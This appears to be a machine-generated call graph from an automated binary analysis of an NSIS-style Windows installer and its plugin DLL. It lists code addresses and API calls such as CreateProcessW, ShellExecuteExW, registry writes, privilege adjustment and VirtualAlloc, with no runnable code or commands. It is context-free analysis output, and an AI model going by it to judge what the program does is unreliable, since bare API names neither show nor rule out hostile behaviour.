4331 40303e 17 API calls 4330->4331 4333 402384 4331->4333 4332 4023c4 CoCreateInstance 4337 4023e8 4332->4337 4333->4332 4334 40303e 17 API calls 4333->4334 4334->4332 4335 405d15 24 API calls 4336 4024ba 4335->4336 4337->4335 5001 402dd1 5002 402df2 5001->5002 5003 402dd9 5001->5003 5004 4068c1 5 API calls 5002->5004 5005 403002 17 API calls 5003->5005 5011 402e72 5003->5011 5006 402e2a 5004->5006 5007 402de9 5005->5007 5008 40303e 17 API calls 5006->5008 5009 403002 17 API calls 5007->5009 5010 402e33 5008->5010 5009->5002 5010->5011 5012 402e37 IIDFromString 5010->5012 5012->5011 5013 402e47 5012->5013 5013->5011 5016 406af5 lstrcpynW 5013->5016 5015 402e66 CoTaskMemFree 5015->5011 5016->5015 4361 402656 4362 40303e 17 API calls 4361->4362 4363 40266d 4362->4363 4364 40303e 17 API calls 4363->4364 4365 402678 4364->4365 4380 406280 4365->4380 4368 402ea5 4369 4026d1 4372 4026d8 4369->4372 4374 4026e7 4369->4374 4370 4026bb 4371 40303e 17 API calls 4370->4371 4375 4026c2 lstrlenW 4371->4375 4376 403002 17 API calls 4372->4376 4373 402700 RegSetValueExW 4378 40271c RegCloseKey 4373->4378 4374->4373 4377 403148 35 API calls 4374->4377 4375->4373 4379 4026df 4376->4379 4377->4379 4378->4368 4379->4373 4381 40628f 4380->4381 4382 402697 4381->4382 4383 406298 RegCreateKeyExW 4381->4383 4382->4368 4382->4369 4382->4370 4383->4382 4384 4036d7 SetErrorMode GetVersionExW 4385 403722 GetVersionExW 4384->4385 4387 403759 4384->4387 4386 403744 4385->4386 4386->4387 4388 4037c0 4387->4388 4389 4068c1 5 API calls 4387->4389 4390 406179 3 API calls 4388->4390 4389->4388 4391 4037d6 lstrlenA 4390->4391 4391->4388 4392 4037e4 4391->4392 4393 4068c1 5 API calls 4392->4393 4394 4037eb 4393->4394 4395 4068c1 5 API calls 4394->4395 4396 4037f2 4395->4396 4397 4068c1 5 API calls 4396->4397 4398 4037fe #17 OleInitialize SHGetFileInfoW 4397->4398 4474 406af5 lstrcpynW 4398->4474 4401 40384c GetCommandLineW 4475 406af5 lstrcpynW 4401->4475 4403 40385d 4404 4065d1 CharNextW 4403->4404 4405 403897 CharNextW 4404->4405 4406 403985 GetTempPathW 4405->4406 4416 4038b0 4405->4416 4476 403c80 4406->4476 4408 40399d 4409 4039a1 GetWindowsDirectoryW lstrcatW 4408->4409 4410 4039f7 DeleteFileW 4408->4410 4411 403c80 12 API calls 4409->4411 4486 4033c8 GetTickCount GetModuleFileNameW 4410->4486 4413 4039bd 4411->4413 4413->4410 4417 4039c1 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4413->4417 4414 4065d1 CharNextW 4414->4416 4415 403a0a 4418 403a8d 4415->4418 4420 403a7f 4415->4420 4425 4065d1 CharNextW 4415->4425 4416->4406 4416->4414 4423 403971 4416->4423 4419 403c80 12 API calls 4417->4419 4593 4036ad 4418->4593 4422 4039ef 4419->4422 4514 405a19 4420->4514 4422->4410 4422->4418 4571 406af5 lstrcpynW 4423->4571 4438 403a29 4425->4438 4428 403bd4 4430 406a83 MessageBoxIndirectW 4428->4430 4429 403be7 4431 403bf0 GetCurrentProcess OpenProcessToken 4429->4431 4432 403bdf ExitProcess 4429->4432 4430->4432 4436 403c08 LookupPrivilegeValueW AdjustTokenPrivileges 4431->4436 4437 403c3c 4431->4437 4433 403a53 4572 406613 4433->4572 4434 403a94 4441 4064d7 5 API calls 4434->4441 4436->4437 4440 4068c1 5 API calls 4437->4440 4438->4433 4438->4434 4443 403c43 4440->4443 4444 403a99 lstrcatW 4441->4444 4445 403c58 ExitWindowsEx 4443->4445 4448 403c65 4443->4448 4446 403abd lstrcatW lstrcmpiW 4444->4446 4447 403aae lstrcatW 4444->4447 4445->4432 4445->4448 4446->4418 4449 403ae4 4446->4449 4447->4446 4451 401533 94 API calls 4448->4451 4452 403af4 4449->4452 4453 403aed 4449->4453 4451->4432 4456 405df9 2 API calls 4452->4456 4455 405e19 4 API calls 4453->4455 4454 403a74 4587 406af5 lstrcpynW 4454->4587 4458 403af2 4455->4458 4459 403af9 SetCurrentDirectoryW 4456->4459 4458->4459 4460 403b1c 4459->4460 4461 403b0d 4459->4461 4589 406af5 lstrcpynW 4460->4589 4588 406af5 lstrcpynW 4461->4588 4464 405e95 17 API calls 4465 403b4c DeleteFileW 4464->4465 4466 403b57 CopyFileW 4465->4466 4471 403b2a 4465->4471 4466->4471 4467 403bb0 4469 406218 35 API calls 4467->4469 4468 406218 35 API calls 4468->4471 4469->4418 4470 405e95 17 API calls 4470->4471 4471->4464 4471->4467 4471->4468 4471->4470 4473 403b9b CloseHandle 4471->4473 4590 4066b1 CreateProcessW 4471->4590 4473->4471 4474->4401 4475->4403 4477 406d18 5 API calls 4476->4477 4479 403c8c 4477->4479 4478 403c96 4478->4408 4479->4478 4480 406531 3 API calls 4479->4480 4481 403c9e 4480->4481 4482 405df9 2 API calls 4481->4482 4483 403ca4 4482->4483 4484 406a31 2 API calls 4483->4484 4485 403caf 4484->4485 4485->4408 4600 4068f6 GetFileAttributesW CreateFileW 4486->4600 4488 40340a 4506 403417 4488->4506 4601 406af5 lstrcpynW 4488->4601 4490 40342d 4602 406ceb lstrlenW 4490->4602 4494 40343e GetFileSize 4495 403457 4494->4495 4496 403545 4494->4496 4495->4496 4498 40311b ReadFile 4495->4498 4501 403613 4495->4501 4495->4506 4509 403364 6 API calls 4495->4509 4607 403364 4496->4607 4498->4495 4499 403554 4500 403595 GlobalAlloc 4499->4500 4499->4506 4618 403131 SetFilePointer 4499->4618 4619 403131 SetFilePointer 4500->4619 4503 403364 6 API calls 4501->4503 4503->4506 4505 403571 4508 406923 ReadFile 4505->4508 4506->4415 4507 4035b2 4510 403148 35 API calls 4507->4510 4511 403583 4508->4511 4509->4495 4512 4035c1 4510->4512 4511->4500 4511->4506 4512->4506 4513 4035f1 SetFilePointer 4512->4513 4513->4506 4515 4068c1 5 API calls 4514->4515 4516 405a2d 4515->4516 4517 405a36 4516->4517 4518 405a48 4516->4518 4632 4065fa wsprintfW 4517->4632 4519 406952 3 API calls 4518->4519 4520 405a77 4519->4520 4522 405a96 lstrcatW 4520->4522 4524 406952 3 API calls 4520->4524 4523 405a46 4522->4523 4624 40595a 4523->4624 4524->4522 4527 406613 18 API calls 4528 405ac8 4527->4528 4529 405b62 4528->4529 4531 406952 3 API calls 4528->4531 4530 406613 18 API calls 4529->4530 4532 405b68 4530->4532 4533 405afb 4531->4533 4534 405b78 LoadImageW 4532->4534 4535 405e95 17 API calls 4532->4535 4533->4529 4539 405b1f lstrlenW 4533->4539 4541 4065d1 CharNextW 4533->4541 4536 405c25 4534->4536 4537 405ba8 RegisterClassW 4534->4537 4535->4534 4538 401533 94 API calls 4536->4538 4540 405bdc SystemParametersInfoW CreateWindowExW 4537->4540 4570 405bd5 4537->4570 4544 405c2b 4538->4544 4542 405b55 4539->4542 4543 405b2f lstrcmpiW 4539->4543 4540->4536 4546 405b1a 4541->4546 4545 406531 3 API calls 4542->4545 4543->4542 4547 405b3f GetFileAttributesW 4543->4547 4548 40595a 18 API calls 4544->4548 4544->4570 4549 405b5b 4545->4549 4546->4539 4550 405b4b 4547->4550 4552 405c38 4548->4552 4633 406af5 lstrcpynW 4549->4633 4550->4542 4551 406ceb 2 API calls 4550->4551 4551->4542 4554 405c44 ShowWindow 4552->4554 4555 405cc6 4552->4555 4557 406179 3 API calls 4554->4557 4556 40583f 97 API calls 4555->4556 4558 405ccc 4556->4558 4559 405c5c 4557->4559 4560 405cd0 4558->4560 4561 405cea 4558->4561 4562 405c6a GetClassInfoW 4559->4562 4563 406179 3 API calls 4559->4563 4567 401533 94 API calls 4560->4567 4560->4570 4564 401533 94 API calls 4561->4564 4565 405c93 DialogBoxParamW 4562->4565 4566 405c7d GetClassInfoW RegisterClassW 4562->4566 4563->4562 4568 405cf1 4564->4568 4569 401533 94 API calls 4565->4569 4566->4565 4567->4570 4568->4568 4569->4570 4570->4418 4571->4406 4635 406af5 lstrcpynW 4572->4635 4574 406624 4575 406ba0 4 API calls 4574->4575 4576 40662a 4575->4576 4577 406d18 5 API calls 4576->4577 4584 403a61 4576->4584 4578 406636 4577->4578 4579 406666 lstrlenW 4578->4579 4581 4065aa 2 API calls 4578->4581 4578->4584 4585 406ceb 2 API calls 4578->4585 4579->4578 4580 406672 4579->4580 4582 406531 3 API calls 4580->4582 4581->4578 4583 406677 GetFileAttributesW 4582->4583 4583->4584 4584->4418 4586 406af5 lstrcpynW 4584->4586 4585->4579 4586->4454 4587->4420 4588->4460 4589->4471 4591 4066f0 4590->4591 4592 4066e4 CloseHandle 4590->4592 4591->4471 4592->4591 4594 4036c5 4593->4594 4595 4036b7 CloseHandle 4593->4595 4636 403cee 4594->4636 4595->4594 4600->4488 4601->4490 4603 406cfa 4602->4603 4604 406d00 CharPrevW 4603->4604 4605 403433 4603->4605 4604->4603 4604->4605 4606 406af5 lstrcpynW 4605->4606 4606->4494 4608 403383 4607->4608 4609 40336b 4607->4609 4612 403394 GetTickCount 4608->4612 4613 40338c 4608->4613 4610 403374 DestroyWindow 4609->4610 4611 40337b 4609->4611 4610->4611 4611->4499 4615 4033a2 CreateDialogParamW ShowWindow 4612->4615 4616 4033c7 4612->4616 4620 4061ea 4613->4620 4615->4616 4616->4499 4618->4505 4619->4507 4621 4061fc PeekMessageW 4620->4621 4622 4061f2 DispatchMessageW 4621->4622 4623 403393 4621->4623 4622->4621 4623->4499 4625 40596d 4624->4625 4634 4065fa wsprintfW 4625->4634 4627 4059e6 4628 405cf6 18 API calls 4627->4628 4630 4059eb 4628->4630 4629 405a14 4629->4527 4630->4629 4631 405e95 17 API calls 4630->4631 4631->4630 4632->4523 4633->4529 4634->4627 4635->4574 4637 403cfc 4636->4637 4638 4036ca 4637->4638 4639 403d01 FreeLibrary GlobalFree 4637->4639 4640 4066f4 4638->4640 4639->4638 4639->4639 4641 406613 18 API calls 4640->4641 4642 406716 4641->4642 4643 406736 4642->4643 4644 40671f DeleteFileW 4642->4644 4645 4036d6 OleUninitialize 4643->4645 4647 406856 4643->4647 4679 406af5 lstrcpynW 4643->4679 4644->4645 4645->4428 4645->4429 4647->4645 4651 4065aa 2 API calls 4647->4651 4648 40675e 4649 406776 4648->4649 4650 406768 lstrcatW 4648->4650 4653 406ceb 2 API calls 4649->4653 4652 40677c 4650->4652 4654 406873 4651->4654 4655 40678d lstrcatW 4652->4655 4657 406795 lstrlenW FindFirstFileW 4652->4657 4653->4652 4654->4645 4656 406877 4654->4656 4655->4657 4658 406531 3 API calls 4656->4658 4657->4647 4666 4067be 4657->4666 4659 40687d 4658->4659 4660 406560 5 API calls 4659->4660 4661 406889 4660->4661 4664 4068ac 4661->4664 4665 40688d 4661->4665 4663 406838 FindNextFileW 4663->4666 4667 40684f FindClose 4663->4667 4668 405d15 24 API calls 4664->4668 4665->4645 4669 405d15 24 API calls 4665->4669 4666->4663 4673 4066f4 59 API calls 4666->4673 4675 406804 4666->4675 4680 406af5 lstrcpynW 4666->4680 4667->4647 4668->4645 4670 406899 4669->4670 4672 406218 35 API calls 4670->4672 4674 4068a2 4672->4674 4673->4675 4674->4645 4675->4663 4676 405d15 24 API calls 4675->4676 4677 405d15 24 API calls 4675->4677 4678 406218 35 API calls 4675->4678 4681 406560 4675->4681 4676->4663 4677->4675 4678->4675 4679->4648 4680->4666 4682 406b78 2 API calls 4681->4682 4683 40656c 4682->4683 4684 406584 DeleteFileW 4683->4684 4685 40657c RemoveDirectoryW 4683->4685 4687 40658e 4683->4687 4686 40658a 4684->4686 4685->4686 4686->4687 4688 406599 SetFileAttributesW 4686->4688 4687->4675 4688->4687 4689 40225d 4690 402335 4689->4690 4691 40226e 4689->4691 4693 405d15 24 API calls 4690->4693 4692 40303e 17 API calls 4691->4692 4694 402275 4692->4694 4700 40234a 4693->4700 4695 40303e 17 API calls 4694->4695 4696 402281 4695->4696 4697 40228b GetModuleHandleW 4696->4697 4698 40229c LoadLibraryExW 4696->4698 4699 4022b0 4697->4699 4701 402298 4697->4701 4698->4690 4698->4699 4710 406244 4699->4710 4701->4698 4704 4022c4 4707 405d15 24 API calls 4704->4707 4708 4022da 4704->4708 4705 402306 4706 405d15 24 API calls 4705->4706 4706->4708 4707->4708 4708->4700 4709 402329 FreeLibrary 4708->4709 4709->4700 4715 406444 WideCharToMultiByte 4710->4715 4712 406261 4713 406268 GetProcAddress 4712->4713 4714 4022ba 4712->4714 4713->4714 4714->4704 4714->4705 4715->4712 5017 402cde 5018 403002 17 API calls 5017->5018 5020 402b21 5018->5020 5019 402d10 5021 402d35 5019->5021 5022 402d25 5019->5022 5020->5017 5020->5019 5024 401709 5020->5024 5023 405e95 17 API calls 5021->5023 5025 403002 17 API calls 5022->5025 5023->5024 5025->5024 5026 40285f 5027 402883 5026->5027 5028 402899 5026->5028 5029 403002 17 API calls 5027->5029 5030 4028c3 5028->5030 5031 40289e 5028->5031 5040 402889 5029->5040 5032 40303e 17 API calls 5030->5032 5033 40303e 17 API calls 5031->5033 5035 4028ca lstrlenW 5032->5035 5034 4028a5 5033->5034 5043 406444 WideCharToMultiByte 5034->5043 5035->5040 5037 402910 5038 4028b5 lstrlenA 5038->5040 5039 4028fc 5039->5037 5041 4069e6 WriteFile 5039->5041 5040->5037 5040->5039 5042 40645f 5 API calls 5040->5042 5041->5037 5042->5039 5043->5038 5044 404060 5045 404087 5044->5045 5046 40409d 5044->5046 5105 406a15 GetDlgItemTextW 5045->5105 5048 4040a7 GetDlgItem 5046->5048 5054 40411a 5046->5054 5050 4040bf 5048->5050 5049 404092 5052 406d18 5 API calls 5049->5052 5056 4040d3 SetWindowTextW 5050->5056 5060 406ba0 4 API calls 5050->5060 5051 404139 5055 404098 5051->5055 5107 406a15 GetDlgItemTextW 5051->5107 5052->5055 5054->5051 5059 405e95 17 API calls 5054->5059 5064 405736 8 API calls 5055->5064 5058 4054f5 18 API calls 5056->5058 5057 404230 5061 406613 18 API calls 5057->5061 5062 4040f0 5058->5062 5063 404195 SHBrowseForFolderW 5059->5063 5065 4040c9 5060->5065 5066 404236 5061->5066 5067 4054f5 18 API calls 5062->5067 5063->5051 5068 4041b0 CoTaskMemFree 5063->5068 5069 4043f1 5064->5069 5065->5056 5070 406531 3 API calls 5065->5070 5108 406af5 lstrcpynW 5066->5108 5072 4040fb 5067->5072 5073 406531 3 API calls 5068->5073 5070->5056 5106 4054de SendMessageW 5072->5106 5076 4041bd 5073->5076 5074 404250 5077 4068c1 5 API calls 5074->5077 5079 4041fa SetDlgItemTextW 5076->5079 5082 405e95 17 API calls 5076->5082 5080 404256 5077->5080 5078 404101 5081 4068c1 5 API calls 5078->5081 5079->5051 5090 406ceb 2 API calls 5080->5090 5092 4042ab 5080->5092 5093 404305 5080->5093 5081->5055 5084 4041db lstrcmpiW 5082->5084 5084->5079 5086 4041ef lstrcatW 5084->5086 5085 4042b7 5087 406ba0 4 API calls 5085->5087 5086->5079 5088 4042bd GetDiskFreeSpaceW 5087->5088 5091 4042e5 MulDiv 5088->5091 5088->5093 5090->5080 5091->5093 5109 406af5 lstrcpynW 5092->5109 5094 40437c 5093->5094 5110 40553b 5093->5110 5096 4043a4 EnableWindow 5094->5096 5097 401533 94 API calls 5094->5097 5096->5055 5098 4043cd 5096->5098 5100 4043a2 5097->5100 5098->5055 5118 405517 SendMessageW 5098->5118 5099 404364 5101 404368 5099->5101 5102 40437e SetDlgItemTextW 5099->5102 5100->5096 5104 40553b 20 API calls 5101->5104 5102->5094 5104->5094 5105->5049 5106->5078 5107->5057 5108->5074 5109->5085 5111 405550 5110->5111 5112 405e95 17 API calls 5111->5112 5113 4055d9 5112->5113 5114 405e95 17 API calls 5113->5114 5115 4055e5 5114->5115 5116 405e95 17 API calls 5115->5116 5117 4055f1 lstrlenW wsprintfW SetDlgItemTextW 5116->5117 5117->5099 5118->5055 5119 401ce0 5120 40303e 17 API calls 5119->5120 5121 401ce7 5120->5121 5122 403002 17 API calls 5121->5122 5123 401cf0 wsprintfW 5122->5123 5124 402ea1 5123->5124 5125 403d65 5126 403d7a 5125->5126 5127 403e9f 5125->5127 5130 4054f5 18 API calls 5126->5130 5128 403f20 5127->5128 5129 403ead 5127->5129 5131 403f2b GetDlgItem 5128->5131 5143 403f1b 5128->5143 5138 403eda GetDlgItem SendMessageW EnableWindow 5129->5138 5129->5143 5133 403de9 5130->5133 5136 403f4d 5131->5136 5137 403fee 5131->5137 5132 405736 8 API calls 5134 404033 5132->5134 5135 4054f5 18 API calls 5133->5135 5140 403df8 CheckDlgButton EnableWindow GetDlgItem 5135->5140 5141 403f7d SendMessageW LoadCursorW SetCursor 5136->5141 5136->5143 5142 403fff 5137->5142 5137->5143 5154 405517 SendMessageW 5138->5154 5153 4054de SendMessageW 5140->5153 5155 4069ce ShellExecuteExW 5141->5155 5146 404007 SendMessageW 5142->5146 5147 40401e 5142->5147 5143->5132 5146->5147 5147->5134 5150 404023 SendMessageW 5147->5150 5148 403e2b SendMessageW 5151 403e50 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5148->5151 5152 403e47 GetSysColor 5148->5152 5149 403fe0 LoadCursorW SetCursor 5149->5137 5150->5134 5151->5134 5152->5151 5153->5148 5154->5143 5155->5149 5156 402566 5157 402574 5156->5157 5158 40256e 5156->5158 5160 402585 5157->5160 5161 40303e 17 API calls 5157->5161 5159 40303e 17 API calls 5158->5159 5159->5157 5163 40303e 17 API calls 5160->5163 5164 402594 5160->5164 5161->5160 5162 40303e 17 API calls 5165 40259d WritePrivateProfileStringW 5162->5165 5163->5164 5164->5162 5166 405667 lstrlenW WideCharToMultiByte 5167 402d69 5168 403002 17 API calls 5167->5168 5169 402d6f 5168->5169 5170 405e95 17 API calls 5169->5170 5171 401709 5169->5171 5170->5171 5172 401eea 5173 401ef4 5172->5173 5174 401efe GetDlgItem 5172->5174 5175 403002 17 API calls 5173->5175 5176 401efb 5174->5176 5175->5176 5177 40303e 17 API calls 5176->5177 5180 401f3c GetClientRect LoadImageW SendMessageW 5176->5180 5177->5180 5179 401f9c 5181 401fa0 DeleteObject 5179->5181 5182 401fa7 5179->5182 5180->5179 5180->5182 5181->5182 5183 401aec 5184 401aa2 5183->5184 5188 401ab1 5183->5188 5185 40303e 17 API calls 5184->5185 5186 401aa7 5185->5186 5187 4066f4 66 API calls 5186->5187 5187->5188 5189 40216c 5190 40303e 17 API calls 5189->5190 5191 402173 5190->5191 5192 4065aa 2 API calls 5191->5192 5193 402179 5192->5193 5194 402188 5193->5194 5196 4065fa wsprintfW 5193->5196 5196->5194 4243 404f6d 4244 404f8c 4243->4244 4245 40510e 4243->4245 4244->4245 4246 404f98 4244->4246 4247 405122 GetDlgItem GetDlgItem 4245->4247 4248 40515b 4245->4248 4249 404fb7 4246->4249 4250 404f9d SetWindowPos 4246->4250 4251 4054f5 18 API calls 4247->4251 4252 4051b2 4248->4252 4262 401399 94 API calls 4248->4262 4254 40500a 4249->4254 4255 404fbc ShowWindow 4249->4255 4253 4050fa 4250->4253 4257 405145 SetClassLongW 4251->4257 4256 4054c3 SendMessageW 4252->4256 4269 405109 4252->4269 4264 405736 8 API calls 4253->4264 4259 405012 DestroyWindow 4254->4259 4260 40502c 4254->4260 4255->4253 4258 404fe1 GetWindowLongW 4255->4258 4286 4051c4 4256->4286 4261 401533 94 API calls 4257->4261 4258->4253 4265 404ffd ShowWindow 4258->4265 4271 405443 4259->4271 4266 405031 SetWindowLongW 4260->4266 4267 405044 4260->4267 4261->4248 4263 40518b 4262->4263 4263->4252 4268 40518f SendMessageW 4263->4268 4264->4269 4265->4253 4266->4269 4267->4253 4273 405050 GetDlgItem 4267->4273 4268->4269 4270 401533 94 API calls 4270->4286 4271->4269 4274 405476 ShowWindow 4271->4274 4272 405445 DestroyWindow EndDialog 4272->4271 4275 40506c SendMessageW IsWindowEnabled 4273->4275 4276 40508f 4273->4276 4274->4269 4275->4269 4278 40508b 4275->4278 4279 40509e 4276->4279 4280 4050e1 SendMessageW 4276->4280 4281 4050b0 4276->4281 4290 405096 4276->4290 4277 405e95 17 API calls 4277->4286 4278->4276 4279->4280 4279->4290 4280->4253 4284 4050c7 4281->4284 4285 4050b9 4281->4285 4282 405933 SendMessageW 4283 4050df 4282->4283 4283->4253 4289 401533 94 API calls 4284->4289 4319 401533 4285->4319 4286->4269 4286->4270 4286->4272 4286->4277 4287 4054f5 18 API calls 4286->4287 4292 4054f5 18 API calls 4286->4292 4305 405385 DestroyWindow 4286->4305 4287->4286 4291 4050ce 4289->4291 4290->4282 4291->4253 4291->4290 4293 405248 GetDlgItem 4292->4293 4294 405263 4293->4294 4295 40526f ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 4293->4295 4294->4295 4296 4052c4 GetSystemMenu EnableMenuItem SendMessageW 4294->4296 4314 4054de SendMessageW 4294->4314 4315 405cf6 4294->4315 4318 406af5 lstrcpynW 4294->4318 4295->4294 4296->4294 4297 4052f1 SendMessageW 4296->4297 4297->4294 4301 405323 lstrlenW 4302 405e95 17 API calls 4301->4302 4303 40533d SetWindowTextW 4302->4303 4304 401399 94 API calls 4303->4304 4304->4286 4305->4271 4306 40539f CreateDialogParamW 4305->4306 4306->4271 4307 4053d2 4306->4307 4308 4054f5 18 API calls 4307->4308 4309 4053dd GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4308->4309 4310 401399 94 API calls 4309->4310 4311 405423 4310->4311 4311->4269 4312 40542b ShowWindow 4311->4312 4313 4054c3 SendMessageW 4312->4313 4313->4271 4314->4294 4316 405e95 17 API calls 4315->4316 4317 405d04 SetWindowTextW 4316->4317 4317->4294 4318->4301 4320 401399 94 API calls 4319->4320 4321 401547 4320->4321 4321->4290 5197 73472c6a 5198 73472cc3 5197->5198 5200 73472cd8 5197->5200 5199 73472ccd GetLastError 5198->5199 5198->5200 5199->5200 5201 401af0 5202 40303e 17 API calls 5201->5202 5203 401af7 lstrlenW 5202->5203 5205 401afd 5203->5205 5204 40303e 17 API calls 5204->5205 5205->5204 5207 402855 5205->5207 5208 4068f6 GetFileAttributesW CreateFileW 5205->5208 5208->5205 4348 402af5 4349 402afc 4348->4349 4350 401709 4348->4350 4351 403002 17 API calls 4349->4351 4352 402b03 4351->4352 4353 402b10 SetFilePointer 4352->4353 4353->4350 4355 402b21 4353->4355 4354 403002 17 API calls 4354->4355 4355->4350 4355->4354 4356 402d10 4355->4356 4357 402d35 4356->4357 4358 402d25 4356->4358 4359 405e95 17 API calls 4357->4359 4360 403002 17 API calls 4358->4360 4359->4350 4360->4350 5209 402b75 5210 40303e 17 API calls 5209->5210 5211 402b7c FindFirstFileW 5210->5211 5212 402b90 5211->5212 5215 4065fa wsprintfW 5212->5215 5214 402b67 5215->5214 5216 402077 5217 40303e 17 API calls 5216->5217 5218 40207d 5217->5218 5219 40303e 17 API calls 5218->5219 5220 402086 5219->5220 5221 40303e 17 API calls 5220->5221 5222 40208f 5221->5222 5223 40303e 17 API calls 5222->5223 5224 402098 5223->5224 5225 405d15 24 API calls 5224->5225 5226 4020a4 5225->5226 5233 4069ce ShellExecuteExW 5226->5233 5228 4020ea 5231 401709 5228->5231 5234 4064ef WaitForSingleObject 5228->5234 5230 402109 CloseHandle 5230->5231 5233->5228 5235 406506 5234->5235 5236 40651c GetExitCodeProcess 5235->5236 5237 4061ea 2 API calls 5235->5237 5236->5230 5238 40650d WaitForSingleObject 5237->5238 5238->5235 5239 4043f9 GetDlgItem GetDlgItem 5240 40444d 7 API calls 5239->5240 5244 404673 5239->5244 5241 4044f0 DeleteObject 5240->5241 5242 4044e3 SendMessageW 5240->5242 5243 4044ff 5241->5243 5242->5241 5249 405e95 17 API calls 5243->5249 5250 40453d 5243->5250 5264 4047aa 5244->5264 5273 404705 5244->5273 5293 4056b5 SendMessageW 5244->5293 5245 404884 5247 404893 SendMessageW 5245->5247 5248 4048af 5245->5248 5246 4047ef 5257 40480e SendMessageW 5246->5257 5266 4048d9 5246->5266 5247->5266 5252 4048b9 5248->5252 5274 4048ef 5248->5274 5255 404515 SendMessageW SendMessageW 5249->5255 5256 4054f5 18 API calls 5250->5256 5251 404792 SendMessageW 5251->5264 5258 4048c2 ImageList_Destroy 5252->5258 5259 4048c9 5252->5259 5253 405736 8 API calls 5260 404b01 5253->5260 5255->5243 5261 404555 5256->5261 5262 40482b SendMessageW 5257->5262 5257->5266 5258->5259 5265 4048d2 GlobalFree 5259->5265 5259->5266 5267 4054f5 18 API calls 5261->5267 5268 404844 5262->5268 5263 404ab8 5263->5266 5269 404acf ShowWindow GetDlgItem ShowWindow 5263->5269 5264->5245 5264->5246 5265->5266 5266->5253 5279 404561 5267->5279 5271 40485a SendMessageW 5268->5271 5269->5266 5270 404640 GetWindowLongW SetWindowLongW 5272 404656 5270->5272 5271->5274 5275 40466d 5272->5275 5276 40465d ShowWindow 5272->5276 5273->5251 5273->5264 5274->5263 5287 404926 5274->5287 5298 405491 5274->5298 5292 4054de SendMessageW 5275->5292 5276->5275 5278 4045b9 SendMessageW 5278->5279 5279->5270 5279->5278 5280 4045f5 SendMessageW 5279->5280 5281 404608 SendMessageW 5279->5281 5282 40463c 5279->5282 5280->5279 5281->5279 5282->5270 5282->5272 5284 404a6e 5285 404a8a InvalidateRect 5284->5285 5289 404a99 5284->5289 5285->5289 5286 404964 SendMessageW 5288 40497e 5286->5288 5287->5286 5287->5288 5288->5284 5290 404a14 SendMessageW SendMessageW 5288->5290 5289->5263 5291 40553b 20 API calls 5289->5291 5290->5288 5291->5263 5292->5244 5294 405714 SendMessageW 5293->5294 5295 4056d6 GetMessagePos ScreenToClient SendMessageW 5293->5295 5297 40570c 5294->5297 5296 405711 5295->5296 5295->5297 5296->5294 5297->5273 5307 406af5 lstrcpynW 5298->5307 5300 4054a4 5308 4065fa wsprintfW 5300->5308 5302 4054ae 5303 401533 94 API calls 5302->5303 5304 4054b7 5303->5304 5309 406af5 lstrcpynW 5304->5309 5306 4054be 5306->5287 5307->5300 5308->5302 5309->5306 5310 402e7c SendMessageW 5311 402e94 InvalidateRect 5310->5311 5312 402ea1 5310->5312 5311->5312 4716 7347167a 4717 734716b7 4716->4717 4758 73472351 4717->4758 4719 734716be 4720 734717ef 4719->4720 4721 734716d6 4719->4721 4722 734716cf 4719->4722 4788 73472049 4721->4788 4804 73471fcb 4722->4804 4727 73471722 4817 73472209 4727->4817 4728 73471740 4733 73471746 4728->4733 4734 73471791 4728->4734 4729 734716eb 4732 734716f5 4729->4732 4736 73471702 4729->4736 4730 7347170a 4742 73471700 4730->4742 4814 73472f9f 4730->4814 4732->4742 4798 73472d14 4732->4798 4836 73471f1e 4733->4836 4740 73472209 10 API calls 4734->4740 4735 73471728 4828 73471668 4735->4828 4808 734717f7 4736->4808 4745 7347177e 4740->4745 4742->4727 4742->4728 4757 734717de 4745->4757 4841 7347200d 4745->4841 4747 73471708 4747->4742 4748 73472209 10 API calls 4748->4745 4752 734717e8 GlobalFree 4752->4720 4754 734717cf 4754->4757 4845 734715c5 wsprintfW 4754->4845 4755 734717c2 FreeLibrary 4755->4754 4757->4720 4757->4752 4848 734712f8 GlobalAlloc 4758->4848 4760 7347237f 4849 734712f8 GlobalAlloc 4760->4849 4762 73472a3a GlobalFree GlobalFree GlobalFree 4763 73472a5a 4762->4763 4777 73472aa7 4762->4777 4764 73472af7 4763->4764 4769 73472a73 4763->4769 4763->4777 4766 73472b19 GetModuleHandleW 4764->4766 4764->4777 4765 73472947 GlobalAlloc 4783 7347238a 4765->4783 4767 73472b3f 4766->4767 4768 73472b2a LoadLibraryW 4766->4768 4856 73471f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4767->4856 4768->4767 4768->4777 4775 734712e1 2 API calls 4769->4775 4769->4777 4771 7347299f lstrcpyW 4771->4783 4772 734729bd GlobalFree 4772->4783 4773 73472b8e 4774 73472b9c lstrlenW 4773->4774 4773->4777 4857 73471f7b WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4774->4857 4775->4777 4776 734729af lstrcpyW 4776->4783 4777->4719 4778 73472b4c 4778->4773 4786 73472b78 GetProcAddress 4778->4786 4780 73472bb6 4780->4777 4782 73472822 GlobalFree 4782->4783 4783->4762 4783->4765 4783->4771 4783->4772 4783->4776 4783->4782 4785 734729fb 4783->4785 4850 734712f8 GlobalAlloc 4783->4850 4851 734712e1 4783->4851 4785->4783 4854 73471309 GlobalSize GlobalAlloc 4785->4854 4786->4773 4793 7347205e 4788->4793 4790 734721be GlobalFree 4790->4793 4794 734716dc 4790->4794 4791 73472124 GlobalAlloc WideCharToMultiByte 4791->4790 4792 73472154 GlobalAlloc CLSIDFromString 4792->4793 4793->4790 4793->4791 4793->4792 4795 734712e1 lstrcpynW GlobalAlloc 4793->4795 4797 7347208b 4793->4797 4794->4729 4794->4730 4794->4742 4795->4793 4797->4790 4797->4793 4859 73471548 4797->4859 4864 734719db 4797->4864 4800 73472d26 4798->4800 4799 73472dcb VirtualAlloc 4803 73472de9 4799->4803 4800->4799 4867 73472cbf 4803->4867 4805 73471fde 4804->4805 4806 73471fe9 GlobalAlloc 4805->4806 4807 734716d5 4805->4807 4806->4805 4807->4721 4812 73471823 4808->4812 4809 73471897 GlobalAlloc 4813 734718b5 4809->4813 4810 734718a8 4811 734718ac GlobalSize 4810->4811 4810->4813 4811->4813 4812->4809 4812->4810 4813->4747 4815 73472faa 4814->4815 4816 73472fea GlobalFree 4815->4816 4870 734712f8 GlobalAlloc 4817->4870 4819 734722b7 lstrcpynW 4822 73472211 4819->4822 4820 734722a6 StringFromGUID2 